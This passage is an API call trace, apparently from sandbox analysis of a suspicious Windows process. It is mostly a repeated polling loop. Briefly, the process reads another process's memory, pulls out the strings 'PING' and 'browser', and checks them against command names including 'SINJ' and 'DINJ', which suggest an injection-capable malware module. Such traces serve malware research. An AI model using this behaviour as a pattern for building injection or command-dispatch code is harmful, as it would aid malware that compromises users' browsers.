	[0238.402] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf2c0) returned 1
	[0238.402] Sleep (dwMilliseconds=0xbb8) 
	[0238.416] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.416] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.416] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.416] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.416] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.416] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf2c0) returned 1
	[0238.416] Sleep (dwMilliseconds=0xbb8) 
	[0238.478] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.478] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.478] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.478] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.478] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.478] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf2c0) returned 1
	[0238.478] Sleep (dwMilliseconds=0xbb8) 
	[0238.551] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.551] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.551] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.551] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.551] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.551] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f20) returned 1
	[0238.551] Sleep (dwMilliseconds=0xbb8) 
	[0238.584] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.584] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.584] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.584] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.584] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.584] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f20) returned 1
	[0238.584] Sleep (dwMilliseconds=0xbb8) 
	[0238.587] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.587] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.587] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.587] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.587] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.587] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f20) returned 1
	[0238.587] Sleep (dwMilliseconds=0xbb8) 
	[0238.603] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.603] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.603] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.603] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.603] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.603] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f20) returned 1
	[0238.603] Sleep (dwMilliseconds=0xbb8) 
	[0238.619] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.620] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.620] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.620] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.620] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.620] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f20) returned 1
	[0238.620] Sleep (dwMilliseconds=0xbb8) 
	[0238.637] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0238.637] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0238.637] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26d4600
	[0238.637] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0238.638] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0238.638] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0238.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0238.638] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7a10
	[0238.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x22b7a10, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0238.638] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26d4600, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26d4600, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0238.638] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x2251f8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2251f8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0238.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0238.638] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27382e0
	[0238.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x27382e0, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0238.638] SetEvent (hEvent=0x474) returned 1
	[0238.639] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0238.639] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26d4600) returned 1
	[0238.639] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0238.639] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737e08
	[0238.639] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0238.639] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0238.639] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0238.639] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0238.639] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0238.639] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b79f8
	[0238.639] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2737f20, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xbac) returned 0x5f8
	[0238.640] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27380b0
	[0238.640] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.640] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.640] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.640] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.640] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27380b0) returned 1
	[0238.640] Sleep (dwMilliseconds=0xbb8) 
	[0238.650] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.650] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.650] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.650] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.650] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.650] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.650] Sleep (dwMilliseconds=0xbb8) 
	[0238.665] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.665] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.665] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.665] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.665] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.666] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.666] Sleep (dwMilliseconds=0xbb8) 
	[0238.681] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.682] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.682] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.682] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.682] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.682] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.682] Sleep (dwMilliseconds=0xbb8) 
	[0238.696] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.696] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.696] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.696] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.696] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.696] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.696] Sleep (dwMilliseconds=0xbb8) 
	[0238.712] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.712] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.712] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.712] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.712] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.712] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.712] Sleep (dwMilliseconds=0xbb8) 
	[0238.728] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.728] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.728] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.728] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.728] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.728] Sleep (dwMilliseconds=0xbb8) 
	[0238.743] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.743] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.743] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.744] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.744] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.744] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.744] Sleep (dwMilliseconds=0xbb8) 
	[0238.759] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.759] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.759] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.759] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.759] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.759] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.759] Sleep (dwMilliseconds=0xbb8) 
	[0238.775] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.775] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.775] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.775] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.775] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.775] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.775] Sleep (dwMilliseconds=0xbb8) 
	[0238.793] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.793] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.793] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.793] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.793] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.793] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.793] Sleep (dwMilliseconds=0xbb8) 
	[0238.806] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.806] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.806] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.806] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.806] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.806] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.806] Sleep (dwMilliseconds=0xbb8) 
	[0238.821] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.821] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.821] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.821] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.821] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.821] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.821] Sleep (dwMilliseconds=0xbb8) 
	[0238.837] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.837] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.837] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.837] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.837] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.837] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.838] Sleep (dwMilliseconds=0xbb8) 
	[0238.852] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.853] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.853] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.853] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.853] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.853] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.853] Sleep (dwMilliseconds=0xbb8) 
	[0238.868] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.868] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.868] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.868] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.868] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.869] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.869] Sleep (dwMilliseconds=0xbb8) 
	[0238.884] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ed0
	[0238.884] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.884] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.884] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.884] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.884] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.884] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.884] Sleep (dwMilliseconds=0xbb8) 
	[0238.899] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ed0
	[0238.899] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.899] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.899] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.899] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.899] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.899] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.899] Sleep (dwMilliseconds=0xbb8) 
	[0238.915] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ed0
	[0238.915] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.915] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.915] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.915] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.915] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.915] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.915] Sleep (dwMilliseconds=0xbb8) 
	[0238.930] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ed0
	[0238.930] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.931] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.931] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.931] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.931] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.931] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.931] Sleep (dwMilliseconds=0xbb8) 
	[0238.946] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ed0
	[0238.946] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.946] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.946] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.946] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.946] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.946] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.946] Sleep (dwMilliseconds=0xbb8) 
	[0238.961] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ed0
	[0238.961] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.961] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.961] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.962] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.962] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.962] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.962] Sleep (dwMilliseconds=0xbb8) 
	[0238.977] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ed0
	[0238.977] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.977] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.977] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.977] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.977] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.977] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.977] Sleep (dwMilliseconds=0xbb8) 
	[0238.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ed0
	[0238.993] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.993] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.993] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.993] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.993] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.993] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0238.993] Sleep (dwMilliseconds=0xbb8) 
	[0239.008] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ed0
	[0239.008] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.008] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.008] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.008] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.008] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.008] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ed0) returned 1
	[0239.008] Sleep (dwMilliseconds=0xbb8) 
	[0239.024] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bff18
	[0239.024] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.024] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.024] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.024] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.024] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.024] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0239.024] Sleep (dwMilliseconds=0xbb8) 
	[0239.040] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bff18
	[0239.040] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.040] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.040] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.040] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.040] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.040] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0239.040] Sleep (dwMilliseconds=0xbb8) 
	[0239.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bff18
	[0239.055] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.055] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.055] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.055] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.055] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.055] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0239.055] Sleep (dwMilliseconds=0xbb8) 
	[0239.071] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bff18
	[0239.071] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.071] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.071] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.071] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.071] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.071] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0239.071] Sleep (dwMilliseconds=0xbb8) 
	[0239.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bff18
	[0239.087] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.087] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.087] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.087] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.087] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.087] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0239.087] Sleep (dwMilliseconds=0xbb8) 
	[0239.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bff18
	[0239.283] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.283] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.283] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
